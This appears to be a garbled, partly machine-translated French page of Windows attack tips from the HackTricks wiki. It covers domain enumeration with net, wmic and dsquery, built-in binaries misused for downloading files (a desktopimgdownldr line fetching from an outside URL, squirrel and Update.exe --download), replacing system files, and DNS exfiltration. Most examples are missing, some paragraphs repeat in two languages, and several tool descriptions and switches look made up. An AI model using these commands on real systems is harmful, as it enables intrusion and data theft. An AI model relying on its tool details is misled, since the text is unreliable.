* Travaillez-vous dans une **entreprise de cybersécurité** ? Voulez-vous voir votre **entreprise annoncée dans HackTricks** ? ou voulez-vous avoir accès à la **dernière version de PEASS ou télécharger HackTricks en PDF** ? Consultez les [**PLANS D'ABONNEMENT**](https://github.com/sponsors/carlospolop) !
* Découvrez [**The PEASS Family**](https://opensea.io/collection/the-peass-family), notre collection exclusive de [**NFTs**](https://opensea.io/collection/the-peass-family)
* Obtenez le [**swag officiel PEASS & HackTricks**](https://peass.creator-spring.com)
* **Rejoignez le** [**💬**](https://emojipedia.org/speech-balloon/) [**groupe Discord**](https://discord.gg/hRep4RUj7f) ou le [**groupe telegram**](https://t.me/peass) ou **suivez** moi sur **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
* **Partagez vos astuces de piratage en soumettant des PR au** [**repo hacktricks**](https://github.com/carlospolop/hacktricks) **et au** [**repo hacktricks-cloud**](https://github.com/carlospolop/hacktricks-cloud).
wmic useraccount list /format:list #Displays information about all local accounts and any domain accounts that have logged into the device
wmic /NAMESPACE:\\root\directory\ldap PATH ds_user GET ds_samaccountname #Get all users
wmic /NAMESPACE:\\root\directory\ldap PATH ds_user where "ds_samaccountname='user_name'" GET # Get info of 1 users
wmic sysaccount list /format:list #Dumps information about any system accounts that are being used as service accounts.
# Groups
net group /domain #List of domain groups
net localgroup administrators /domain #List uses that belongs to the administrators group inside the domain (the group "Domain Admins" is included here)
net group "Domain Admins" /domain #List users with domain admin privileges
net group "domain computers" /domain #List of PCs connected to the domain
net group "Domain Controllers" /domain #List PC accounts of domains controllers
wmic group list /format:list # Information about all local groups
wmic /NAMESPACE:\\root\directory\ldap PATH ds_group GET ds_samaccountname #Get all groups
wmic /NAMESPACE:\\root\directory\ldap PATH ds_group where "ds_samaccountname='Domain Admins'" Get ds_member /Value #Members of the group
wmic path win32_groupuser where (groupcomponent="win32_group.name="domain admins",domain="DOMAIN_NAME"") #Members of the group
# Computers
dsquery computer #Get all computers
net view /domain #Lis of PCs of the domain
nltest /dclist:<DOMAIN>#List domain controllers
wmic /NAMESPACE:\\root\directory\ldap PATH ds_computer GET ds_samaccountname #All computers
wmic /NAMESPACE:\\root\directory\ldap PATH ds_computer GET ds_dnshostname #All computers
Le protocole SNMP (Simple Network Management Protocol) est utilisé pour gérer et surveiller les équipements réseau tels que les routeurs, les commutateurs et les serveurs. Il permet aux administrateurs réseau de collecter des informations sur les performances et l'état des équipements réseau, ainsi que de configurer ces équipements à distance.
Les outils de gestion SNMP tels que snmpwalk et snmpget peuvent être utilisés pour interroger les équipements réseau et récupérer des informations telles que les adresses IP, les noms d'hôtes, les adresses MAC et les informations de routage. Cependant, il est important de noter que SNMP peut également être utilisé pour collecter des informations sensibles telles que les mots de passe et les clés de chiffrement.
Les attaquants peuvent utiliser des outils tels que SNMP brute-forcing pour deviner les mots de passe SNMP et accéder aux informations sensibles stockées sur les équipements réseau. Il est donc important de configurer correctement les paramètres de sécurité SNMP, tels que les chaînes de communauté SNMP et les autorisations d'accès, pour éviter les fuites d'informations sensibles.
La table ARP (Address Resolution Protocol) est utilisée pour mapper les adresses IP aux adresses MAC. Elle stocke les informations sur les adresses MAC des périphériques connectés au réseau local. Pour afficher la table ARP, utilisez la commande suivante :
CertReq.exe est un outil en ligne de commande qui permet de soumettre des demandes de certificat à une autorité de certification (CA). Il est inclus dans les systèmes d'exploitation Windows et peut être utilisé pour créer et gérer des certificats.
Dans cet exemple, CertReq.exe utilise le fichier d'informations "certificat.inf" pour créer une demande de certificat. Une fois la demande soumise à l'autorité de certification, le certificat sera généré et stocké dans le fichier "certificat.cer".
Certutil.exe est un outil en ligne de commande qui est installé par défaut sur les systèmes d'exploitation Windows. Il est principalement utilisé pour gérer les certificats numériques et les services de certification. Cependant, il peut également être utilisé pour effectuer des tâches de base en tant que pentester.
Certutil.exe peut être utilisé pour vérifier la signature numérique d'un fichier. Cela peut être utile pour déterminer si un fichier a été modifié ou s'il est authentique.
set "SYSTEMROOT=C:\Windows\Temp" && cmd /c desktopimgdownldr.exe /lockscreenurl:https://domain.com:8080/file.ext /eventName:desktopimgdownldr
```
Diantz.exe est un outil de compression de fichiers qui peut être utilisé pour compresser et décompresser des fichiers. Il est souvent utilisé par les attaquants pour compresser des fichiers malveillants afin de les rendre plus difficiles à détecter par les logiciels antivirus. Les pentesteurs peuvent également utiliser Diantz.exe pour compresser des fichiers de données sensibles avant de les transférer sur un réseau non sécurisé.
`Esentutl.exe` est un outil de ligne de commande qui permet de gérer les bases de données Jet Blue (`.edb`). Il est utilisé pour effectuer des tâches telles que la récupération de données, la réparation de fichiers corrompus et la vérification de l'intégrité des fichiers.
## Syntaxe
```
esentutl.exe <command><options>
```
## Commandes
-`/r` - Récupère une base de données à partir d'un fichier journal.
-`/p` - Répare une base de données corrompue.
-`/g` - Vérifie l'intégrité d'une base de données.
-`/d` - Défragmente une base de données.
-`/cc` - Crée une copie de sécurité de la base de données.
-`/mm` - Affiche des informations sur la mémoire utilisée par la base de données.
-`/vss` - Crée une copie de sécurité de la base de données en utilisant le service de cliché instantané de volume (VSS).
## Options courantes
-`/s <path>` - Spécifie le chemin d'accès à la base de données.
-`/o` - Écrase la base de données existante lors de la récupération.
-`/i` - Ignore les erreurs de vérification de l'intégrité de la base de données.
-`/t` - Affiche des informations de débogage supplémentaires.
## Exemples
### Récupérer une base de données à partir d'un fichier journal
`Expand.exe` est un outil de ligne de commande qui permet de décompresser des fichiers compressés dans des archives Microsoft Cabinet (.cab). Il est généralement utilisé pour extraire des fichiers système à partir de fichiers d'installation Windows.
- Extraire tous les fichiers d'une archive `.cab` récursivement :
```
expand.exe -r source.cab
```
- Extraire tous les fichiers d'une archive `.cab` récursivement dans un répertoire spécifique :
```
expand.exe -r source.cab -d C:\destination
```
```
expand \\webdav\folder\file.bat c:\ADS\file.bat
```
Extrac32.exe est un outil de ligne de commande qui permet d'extraire des fichiers à partir de fichiers .cab. Il est disponible sur les systèmes d'exploitation Windows.
`findstr` est une commande de recherche de chaînes de caractères dans des fichiers ou des chaînes de caractères. Elle est très utile pour la recherche de mots de passe, de noms d'utilisateurs et d'autres informations sensibles dans les fichiers système.
-`/b` : Recherche les chaînes de caractères qui commencent par la chaîne spécifiée.
-`/e` : Recherche les chaînes de caractères qui se terminent par la chaîne spécifiée.
-`/l` : Recherche les chaînes de caractères qui correspondent exactement à la chaîne spécifiée.
-`/r` : Recherche les chaînes de caractères qui correspondent à une expression régulière.
-`/s` : Recherche les chaînes de caractères dans les sous-répertoires.
-`/i` : Recherche les chaînes de caractères sans tenir compte de la casse.
-`/x` : Recherche les chaînes de caractères qui correspondent exactement à la chaîne spécifiée, y compris les espaces.
-`/v` : Recherche les chaînes de caractères qui ne correspondent pas à la chaîne spécifiée.
-`/n` : Affiche le numéro de ligne de chaque occurrence trouvée.
-`/m` : Affiche seulement les noms des fichiers contenant des occurrences.
-`/o` : Affiche le décalage de chaque occurrence trouvée.
-`/p` : Skip files with non-printable characters.
-`/f: FichierTexte` : Spécifie un fichier contenant une liste de chaînes de caractères à rechercher.
-`/c: Chaîne` : Spécifie la chaîne de caractères à rechercher.
-`/g: FichierTexte` : Spécifie un fichier contenant une liste de fichiers à rechercher.
## Exemples
-`findstr /s /i /n /p password *.txt` : Recherche le mot de passe dans tous les fichiers texte du répertoire actuel et de ses sous-répertoires, sans tenir compte de la casse, en affichant le numéro de ligne et en sautant les fichiers avec des caractères non imprimables.
-`findstr /s /i /n /p /m /c:"password" *` : Recherche le mot de passe dans tous les fichiers du répertoire actuel et de ses sous-répertoires, sans tenir compte de la casse, en affichant le numéro de ligne et en sautant les fichiers avec des caractères non imprimables, et en affichant seulement les noms des fichiers contenant des occurrences.
-`findstr /s /i /n /p /m /f:liste.txt *` : Recherche toutes les chaînes de caractères contenues dans le fichier `liste.txt` dans tous les fichiers du répertoire actuel et de ses sous-répertoires, sans tenir compte de la casse, en affichant le numéro de ligne et en sautant les fichiers avec des caractères non imprimables, et en affichant seulement les noms des fichiers contenant des occurrences.
`ftp.exe` est un client FTP en ligne de commande qui est inclus dans les systèmes d'exploitation Windows. Il peut être utilisé pour se connecter à un serveur FTP et transférer des fichiers.
Hh.exe is a Microsoft HTML Help executable that is used to display compiled help files (.chm) on Windows systems. It can also be used to execute arbitrary commands on the system.
Hh.exe est un exécutable Microsoft HTML Help qui est utilisé pour afficher des fichiers d'aide compilés (.chm) sur les systèmes Windows. Il peut également être utilisé pour exécuter des commandes arbitraires sur le système.
ieexec.exe is a binary that can be used to execute Internet Explorer with a specific URL. This can be useful for bypassing application whitelisting or executing code on a target machine.
`Makecab.exe` est un outil de compression de fichiers intégré à Windows. Il est souvent utilisé pour compresser des fichiers dans des archives CAB. Les archives CAB sont souvent utilisées pour distribuer des mises à jour logicielles et des pilotes.
-`/V[n]` : Définit le niveau de verbosité. Plus `n` est grand, plus le niveau de détail est élevé.
-`/D var=value` : Définit une variable d'environnement pour le processus de compression.
-`/L dir` : Définit le répertoire de destination pour les fichiers de journalisation.
-`source` : Spécifie le fichier ou le répertoire source à compresser.
-`destination` : Spécifie le nom et le chemin de l'archive CAB à créer. Si cette option n'est pas spécifiée, `makecab.exe` utilise le nom du fichier source avec l'extension `.cab`.
## Exemples
- Pour compresser un fichier nommé `file.txt` dans une archive CAB nommée `file.cab` :
- Pour compresser tous les fichiers dans un répertoire nommé `folder` dans une archive CAB nommée `folder.cab` :
```
makecab folder folder.cab
```
- Pour compresser tous les fichiers dans un répertoire nommé `folder` dans une archive CAB nommée `archive.cab` et enregistrer les fichiers de journalisation dans un répertoire nommé `logs` :
MpCmdRun.exe est l'exécutable de ligne de commande de Windows Defender. Il peut être utilisé pour effectuer des analyses à la demande, mettre à jour les définitions de virus et effectuer d'autres tâches de gestion de Windows Defender.
`Replace.exe` est un outil de ligne de commande qui permet de remplacer des fichiers. Il est souvent utilisé pour remplacer des fichiers système par des fichiers malveillants.
Cet exemple remplace le fichier `calc.exe` dans le répertoire `C:\Windows\System32` par le fichier `calc.exe` malveillant situé dans le répertoire `C:\Malware`. Le fichier original est sauvegardé sous le nom `calc.exe.bak`.
Squirrel.exe est un outil de déploiement et de mise à jour d'applications open source pour Windows. Il est souvent utilisé pour déployer des applications .NET et Electron. Il est important de noter que Squirrel.exe peut être utilisé pour exécuter du code arbitraire sur un système Windows vulnérable.
## Utilisation de Squirrel.exe
Squirrel.exe est souvent utilisé pour déployer des applications .NET et Electron. Il est important de noter que Squirrel.exe peut être utilisé pour exécuter du code arbitraire sur un système Windows vulnérable.
Squirrel.exe peut être détecté en recherchant les fichiers exécutables dans les répertoires d'installation des applications .NET et Electron. Il peut également être détecté en recherchant les processus en cours d'exécution sur un système Windows.
## Prévention de l'utilisation malveillante de Squirrel.exe
Pour prévenir l'utilisation malveillante de Squirrel.exe, il est recommandé de limiter l'accès aux systèmes Windows vulnérables. Les utilisateurs doivent également être conscients des risques potentiels associés à l'installation d'applications tierces et doivent éviter d'installer des applications provenant de sources non fiables.
```
squirrel.exe --download [url to package]
```
# Update.exe
`update.exe` est un fichier exécutable Windows qui est souvent utilisé pour mettre à jour des logiciels ou des pilotes. Cependant, il peut également être utilisé par des attaquants pour exécuter des commandes malveillantes sur un système.
Il est important de noter que `update.exe` est un nom de fichier commun et légitime, donc sa présence sur un système ne signifie pas nécessairement une activité malveillante. Cependant, il est important de surveiller les activités suspectes liées à ce fichier.
Les attaquants peuvent utiliser `update.exe` pour exécuter des commandes malveillantes telles que l'installation de logiciels malveillants, la suppression de fichiers ou la collecte d'informations sensibles. Il est donc important de surveiller les activités liées à ce fichier et de s'assurer que les mises à jour logicielles sont effectuées à partir de sources légitimes.
Si vous soupçonnez que `update.exe` est utilisé de manière malveillante sur votre système, vous pouvez effectuer une analyse antivirus complète et surveiller les activités suspectes à l'aide d'outils de surveillance système tels que Process Monitor.
```
Update.exe --download [url to package]
```
Winword.exe est le processus principal de Microsoft Word, l'application de traitement de texte de la suite bureautique Microsoft Office. Ce processus est responsable de l'exécution de Word et de toutes les fonctionnalités associées, telles que la création, l'édition et l'enregistrement de documents. Les attaquants peuvent utiliser des techniques d'ingénierie sociale pour inciter les utilisateurs à ouvrir des documents malveillants contenant des macros ou des exploits, qui peuvent être utilisés pour exécuter du code malveillant sur le système de l'utilisateur. Les administrateurs système peuvent surveiller l'activité de Winword.exe pour détecter toute activité suspecte ou malveillante.
Wsl.exe est un outil de ligne de commande qui permet d'interagir avec le sous-système Windows pour Linux (WSL). Il peut être utilisé pour gérer les distributions Linux installées sur Windows 10, ainsi que pour exécuter des commandes Linux directement à partir de l'invite de commande Windows. Les utilisateurs peuvent également utiliser Wsl.exe pour exécuter des scripts shell Linux à partir de l'invite de commande Windows.
_**for /f tokens**_ \_\*\*\_technique : Cela nous permet d'exécuter des commandes, d'obtenir les X premiers mots de chaque ligne et de les envoyer via DNS à notre serveur.
In some cases, it may be necessary to call the Windows command prompt (CMD) from C code. This can be useful for automating certain tasks or executing specific commands.
### Using system()
The simplest way to call CMD from C code is to use the `system()` function. This function allows you to execute a command as if it were typed into the command prompt.
Here's an example:
```c
#include <stdlib.h>
int main()
{
system("cmd /c dir");
return 0;
}
```
In this example, the `system()` function is used to execute the `dir` command in CMD. The `/c` flag is used to indicate that the command should be executed and then CMD should exit.
### Using CreateProcess()
Another way to call CMD from C code is to use the `CreateProcess()` function. This function allows you to create a new process and execute a command within that process.
In this example, the `CreateProcess()` function is used to create a new process and execute the `dir` command in CMD. The `STARTUPINFO` and `PROCESS_INFORMATION` structures are used to specify various options for the new process, such as the command line to execute and the environment block to use.
### Conclusion
Calling CMD from C code can be useful for automating tasks or executing specific commands. The `system()` function is the simplest way to do this, while the `CreateProcess()` function provides more control over the new process.
* Travaillez-vous dans une entreprise de **cybersécurité** ? Voulez-vous voir votre entreprise annoncée dans HackTricks ? ou voulez-vous avoir accès à la **dernière version de PEASS ou télécharger HackTricks en PDF** ? Consultez les [**PLANS D'ABONNEMENT**](https://github.com/sponsors/carlospolop) !
* Découvrez [**The PEASS Family**](https://opensea.io/collection/the-peass-family), notre collection exclusive de [**NFTs**](https://opensea.io/collection/the-peass-family)
* Obtenez le [**swag officiel PEASS & HackTricks**](https://peass.creator-spring.com)
* **Rejoignez le** [**💬**](https://emojipedia.org/speech-balloon/) **groupe Discord** ou le [**groupe Telegram**](https://t.me/peass) ou **suivez-moi** sur **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/hacktricks_live).
* **Partagez vos astuces de piratage en soumettant des PR au** [**repo hacktricks**](https://github.com/carlospolop/hacktricks) **et au** [**repo hacktricks-cloud**](https://github.com/carlospolop/hacktricks-cloud).